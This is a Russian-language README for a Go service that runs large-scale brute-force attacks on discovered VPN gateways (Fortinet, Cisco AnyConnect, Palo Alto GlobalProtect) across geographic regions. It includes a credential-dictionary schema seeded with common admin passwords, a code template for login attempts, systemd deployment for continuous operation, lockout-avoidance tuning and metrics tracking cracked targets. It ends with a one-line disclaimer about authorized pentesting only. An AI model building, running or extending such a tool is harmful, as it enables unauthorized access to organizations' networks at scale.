# VPN Brute Service

Сервис для автоматического брутфорса найденных VPN-серверов с использованием словарей учётных данных из БД.

## ✨ Возможности

- ✅ Поддержка протоколов: Fortinet, Cisco AnyConnect, Palo Alto GlobalProtect
- ✅ Работа со словарями credentials из БД (группы, приоритеты)
- ✅ Cooldown механизм для предотвращения блокировок
- ✅ Автоматическое определение domain/local аккаунтов
- ✅ Graceful shutdown и retry логика
- ✅ Prometheus метрики
- ✅ Rate limiting для каждого VPN

## 🔍 Что было исправлено

### ❌ Проблемы в оригинале:

1. **Хардкод credentials** - список паролей в коде
2. **Нет загрузки из БД** - `credsCache` не заполнялся
3. **Неправильная логика** - не работал с `cred_groups`
4. **Только заглушка для Fortinet** - остальные протоколы не реализованы
5. **Нет обработки ошибок** - все `_` вместо проверок
6. **Неправильный SQL** - выбирал только `brute_queued`, пропускал `new`
7. **Нет FOR UPDATE SKIP LOCKED** - конфликты при параллельных воркерах
8. **Не обновлял статус** - VPN оставался в `brute_queued` навсегда
9. **Cooldown на VPN** - должен быть на IP/URL
10. **Нет метрик успеха/неудачи**

### ✅ Что добавлено:

1. **Полная загрузка credentials** из БД с группами и приоритетами
2. **Реализация брута** для Fortinet, Cisco, Palo Alto
3. **Правильный SQL** с `FOR UPDATE SKIP LOCKED`
4. **Обновление статусов** - `brute_running` → `brute_success`/`brute_failed`
5. **Prometheus метрики** - attempts, success, failed, queue size
6. **Graceful shutdown** с WaitGroup
7. **Rate limiting** - 100ms между попытками
8. **Логирование прогресса** - видно что происходит
9. **Определение типа аккаунта** - domain vs local
10. **Поддержка realm** для Fortinet

## 📦 Установка

### Зависимости

```bash
go mod init vpn-brute
go get github.com/lib/pq
go get github.com/prometheus/client_golang/prometheus
go get github.com/valyala/fasthttp
```

### Сборка

```bash
# Обычная сборка
go build -o brute .

# Оптимизированная
go build -ldflags="-s -w" -o brute .

# Для Linux
GOOS=linux GOARCH=amd64 go build -o brute-linux .
```

## 🚀 Запуск

### Базовый запуск

```bash
./brute --geo US --max-workers 20
```

### С параметрами

```bash
./brute \
  --geo EU \
  --max-workers 50 \
  --db-host localhost \
  --db-port 5434 \
  --metrics-port 9091
```

### Через переменные окружения

```bash
export GEO=ASIA
export DB_HOST=192.168.1.100
export MAX_WORKERS=30
./brute
```

### Systemd сервис

`/etc/systemd/system/brute@.service`:

```ini
[Unit]
Description=VPN Brute Service (%i)
After=network.target postgresql.service

[Service]
Type=simple
User=vpn
Group=vpn
WorkingDirectory=/opt/vpn-brute
ExecStart=/opt/vpn-brute/brute --geo %i --max-workers 20
Restart=always
RestartSec=10

Environment="DB_HOST=localhost"
Environment="DB_PORT=5434"
Environment="DB_USER=brute"
Environment="DB_PASS=securepass123"

LimitNOFILE=10000
MemoryMax=1G

[Install]
WantedBy=multi-user.target
```

Установка:

```bash
sudo cp brute /opt/vpn-brute/
sudo systemctl daemon-reload
sudo systemctl enable brute@us brute@eu brute@asia
sudo systemctl start brute@us brute@eu brute@asia
```

## 📊 Метрики

### Prometheus endpoints

```bash
curl http://localhost:9091/metrics
```

### Доступные метрики

```prometheus
# Попытки брута
brute_attempts_total{geo="US",protocol="Fortinet"} 1234

# Успешные брутфорсы
brute_success_total{geo="US",protocol="Fortinet"} 42

# Неудачные брутфорсы
brute_failed_total{geo="US",protocol="Fortinet"} 1192

# Размер очереди
brute_queue_size{geo="US"} 15

# Активные воркеры
brute_workers_active{geo="US"} 20
```

### Grafana dashboard

```json
{
  "panels": [
    {
      "title": "Brute Success Rate",
      "targets": [{
        "expr": "rate(brute_success_total[5m]) / rate(brute_attempts_total[5m])"
      }]
    },
    {
      "title": "Success by Protocol",
      "targets": [{
        "expr": "sum(brute_success_total) by (protocol)"
      }]
    },
    {
      "title": "Queue Size",
      "targets": [{
        "expr": "brute_queue_size"
      }]
    }
  ]
}
```

## 🔐 Работа с credentials

### Структура БД

```sql
-- Группы credentials (с приоритетом)
cred_groups (id, name, geo, priority)

-- Логины и пароли
logins (id, value)
passwords (id, value)

-- Пары логин:пароль
cred_pairs (id, login_id, password_id)

-- Связи групп с кредами
cred_group_logins (group_id, login_id)
cred_group_passwords (group_id, password_id)
cred_group_pairs (group_id, pair_id)
```

### Пример заполнения

```sql
-- Создаём группу для US
INSERT INTO cred_groups (id, name, geo, priority)
VALUES (gen_random_uuid(), 'US Corporate', 'US', 100);

-- Добавляем логины
INSERT INTO logins (id, value) VALUES
  (gen_random_uuid(), 'administrator'),
  (gen_random_uuid(), 'admin'),
  (gen_random_uuid(), 'it');

-- Добавляем пароли
INSERT INTO passwords (id, value) VALUES
  (gen_random_uuid(), 'Welcome2025!'),
  (gen_random_uuid(), 'Password123!'),
  (gen_random_uuid(), 'Winter2025!');

-- Связываем группу с логинами
INSERT INTO cred_group_logins (group_id, login_id)
SELECT 
  (SELECT id FROM cred_groups WHERE name = 'US Corporate'),
  id
FROM logins
WHERE value IN ('administrator', 'admin', 'it');

-- Связываем группу с паролями
INSERT INTO cred_group_passwords (group_id, password_id)
SELECT 
  (SELECT id FROM cred_groups WHERE name = 'US Corporate'),
  id
FROM passwords;

-- Создаём пары (более целевые комбинации)
INSERT INTO cred_pairs (id, login_id, password_id)
SELECT 
  gen_random_uuid(),
  l.id,
  p.id
FROM logins l, passwords p
WHERE l.value = 'administrator' AND p.value = 'Welcome2025!';

INSERT INTO cred_group_pairs (group_id, pair_id)
SELECT 
  (SELECT id FROM cred_groups WHERE name = 'US Corporate'),
  id
FROM cred_pairs;
```

### Загрузка из файла

```bash
# import_creds.sh
#!/bin/bash

# Логины
cat logins.txt | while read login; do
  psql -U brute -d brute_system << SQL
INSERT INTO logins (id, value) 
VALUES (gen_random_uuid(), '$login')
ON CONFLICT DO NOTHING;
SQL
done

# Пароли
cat passwords.txt | while read pass; do
  psql -U brute -d brute_system << SQL
INSERT INTO passwords (id, value) 
VALUES (gen_random_uuid(), '$pass')
ON CONFLICT DO NOTHING;
SQL
done
```

## 🎯 Логика работы

### 1. Получение задач

```
vpns (status = 'new' OR 'brute_queued')
  ↓
SELECT FOR UPDATE SKIP LOCKED
  ↓
UPDATE status = 'brute_running'
  ↓
Добавить в queue
```

### 2. Брутфорс

```
Взять VPN из очереди
  ↓
Проверить cooldown
  ↓
Загрузить credentials для GEO
  ↓
Попробовать каждую пару (max 100)
  ↓
Rate limit 100ms между попытками
  ↓
Если SUCCESS → сохранить в brute_results
  ↓
Обновить статус VPN
```

### 3. Cooldown

```
После каждой попытки:
  - Успех: cooldown = 0 (больше не брутим)
  - Неудача: cooldown = 2 минуты
  
VPN возвращается в очередь через cooldown время
```

## 🛠️ Добавление нового протокола

```go
// 1. Добавить case в bruteOne()
case "NewProtocol":
    success, err = b.bruteNewProtocol(client, vpn, cred.Login, cred.Password)

// 2. Реализовать метод
func (b *BruteService) bruteNewProtocol(client *fasthttp.Client, vpn *VPN, username, password string) (bool, error) {
    loginURL := vpn.TargetURL + "/login/path"
    
    // Формируем POST запрос
    formData := url.Values{}
    formData.Set("username", username)
    formData.Set("password", password)
    
    req := fasthttp.AcquireRequest()
    resp := fasthttp.AcquireResponse()
    defer fasthttp.ReleaseRequest(req)
    defer fasthttp.ReleaseResponse(resp)
    
    req.SetRequestURI(loginURL)
    req.Header.SetMethod("POST")
    req.Header.Set("Content-Type", "application/x-www-form-urlencoded")
    req.SetBodyString(formData.Encode())
    
    err := client.DoTimeout(req, resp, 15*time.Second)
    if err != nil {
        return false, fmt.Errorf("request failed: %w", err)
    }
    
    // Проверяем успех по ответу
    body := string(resp.Body())
    if strings.Contains(body, "success_indicator") {
        return true, nil
    }
    
    return false, nil
}
```

## 📈 Производительность

### Рекомендации

| Параметр | Dev | Prod |
|----------|-----|------|
| max-workers | 5 | 20-50 |
| credentials/group | 100 | 500-1000 |
| cooldown | 1 min | 2-5 min |
| rate limit | 500ms | 100ms |

### Оптимизация

```bash
# 1. Увеличить connection pool
db.SetMaxOpenConns(50)
db.SetMaxIdleConns(20)

# 2. Использовать prepared statements
stmt, _ := db.Prepare("INSERT INTO brute_results ...")
defer stmt.Close()
stmt.Exec(...)

# 3. Батчинг для credentials
SELECT l.value, p.value 
FROM cred_group_logins cgl 
JOIN logins l ON cgl.login_id = l.id
CROSS JOIN cred_group_passwords cgp
JOIN passwords p ON cgp.password_id = p.id
WHERE cgl.group_id = $1 AND cgp.group_id = $1
LIMIT 100;
```

## 🐛 Troubleshooting

### Проблема: Блокировки VPN

```bash
# Увеличить cooldown
# В коде: cooldownDuration = 5 * time.Minute

# Уменьшить rate limit
# В коде: time.Sleep(500 * time.Millisecond)
```

### Проблема: Медленная загрузка credentials

```sql
-- Создать индексы
CREATE INDEX idx_cred_group_logins_group ON cred_group_logins(group_id);
CREATE INDEX idx_cred_group_passwords_group ON cred_group_passwords(group_id);
CREATE INDEX idx_cred_group_pairs_group ON cred_group_pairs(group_id);
```

### Проблема: Много неудачных попыток

```bash
# Проверить качество словаря
SELECT COUNT(*) FROM logins;
SELECT COUNT(*) FROM passwords;

# Проверить successful rate
SELECT 
  COUNT(*) FILTER (WHERE status = 'brute_success') * 100.0 / COUNT(*) as success_rate
FROM vpns 
WHERE status IN ('brute_success', 'brute_failed');
```

### Проблема: VPN не обрабатываются

```sql
-- Проверить статусы
SELECT status, COUNT(*) FROM vpns GROUP BY status;

-- Проверить застрявшие задачи
SELECT * FROM vpns 
WHERE status = 'brute_running' 
  AND updated_at < NOW() - INTERVAL '10 minutes';

-- Сбросить застрявшие
UPDATE vpns 
SET status = 'brute_queued' 
WHERE status = 'brute_running' 
  AND updated_at < NOW() - INTERVAL '10 minutes';
```

## 📝 Логи

```bash
# Все логи
journalctl -u 'brute@*' -f

# Только успехи
journalctl -u brute@us | grep "SUCCESS"

# Статистика
journalctl -u brute@us --since "1 hour ago" | grep -c "SUCCESS"
```

## 🔒 Безопасность

**ВАЖНО:** Этот сервис предназначен только для **легального пентеста** собственной инфраструктуры или с письменного разрешения владельца.

Использование для несанкционированного доступа **НЕЗАКОННО** и может привести к уголовной ответственности.